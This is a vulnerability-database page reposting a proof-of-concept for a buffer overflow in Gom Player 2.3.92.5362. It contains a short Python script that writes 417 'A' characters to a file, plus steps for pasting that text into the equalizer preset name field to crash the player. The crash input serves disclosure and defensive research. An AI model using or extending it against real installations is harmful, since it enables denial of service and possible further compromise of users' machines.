Lucene search
K

Gom Player 2.3.92.5362 Buffer Overflow Exploit

🗓️ 08 Jan 2024 00:00:00Reported by Yehia ElghalyType 
zdt
 zdt
🔗 0day.today👁 257 Views

Gom Player 2.3.92.5362 Buffer Overflow Exploit on Window

Code
# Exploit Title: Gom Player 2.3.92.5362 - Buffer Overflow (PoC)
# Discovered by: Yehia Elghaly (Mrvar0x)
# Vendor Homepage: https://www.gomlab.com/en
# Tested Version: 2.3.92.5362
# Tested on: Windows 7, Windows 10

#  - Open GOM Player
#  - Click on the settings
#  - From the menu, select Audio --> Equalizer
#  - Click on the plus sign to go to the "Add EQ preset" screen
#  - Copy the contents of exploit.txt and paste it into name box, then click OK
#  - Crashed!



#!/usr/bin/python

exploit = 'A' * 417

try:
    file = open("exploit.txt","w")
    file.write(exploit)
    file.close()

    print("POC is created")
except:
    print("POC is not created")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Jan 2024 00:00Current
7.4High risk
Vulners AI Score7.4
257